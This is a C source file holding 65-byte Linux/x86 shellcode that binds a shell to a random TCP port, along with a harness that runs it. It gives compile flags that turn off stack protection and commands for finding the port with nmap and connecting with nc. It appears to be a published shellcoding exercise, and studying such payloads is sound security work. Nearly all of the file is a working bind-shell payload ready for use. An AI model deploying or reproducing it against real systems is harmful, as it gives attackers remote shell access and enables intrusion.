/*
Shell Bind TCP Random Port Shellcode - C Language
Linux/x86
Written in 2013 by Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
With the great support from Tiago Natel, Sec Plus
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tiago4orion@gmail.com
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/*
shell_bind_tcp_random_port_shellcode
* 65 bytes
* null-bytes free
* the port number is set by the system and can be discovered using nmap
(see http://manuals.ts.fujitsu.com/file/4686/posix_s.pdf, page 23, section 2.6.6)
# gcc -m32 -fno-stack-protector -z execstack shell_bind_tcp_random_port_shellcode.c -o shell_bind_tcp_random_port_shellcode
# ./shell_bind_tcp_random_port_shellcode
Testing
# netstat -anp | grep shell
# nmap -sS 127.0.0.1 -p- (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to the port open by shellcode)
# nc 127.0.0.1 port
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89"
"\xe1\xcd\x80\x89\xc6\x5f\xb0\x66\xb3\x04\x52\x56"
"\x89\xe1\xcd\x80\xb0\x66\x43\x89\x54\x24\x08\xcd"
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\xeb\xca";
main ()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}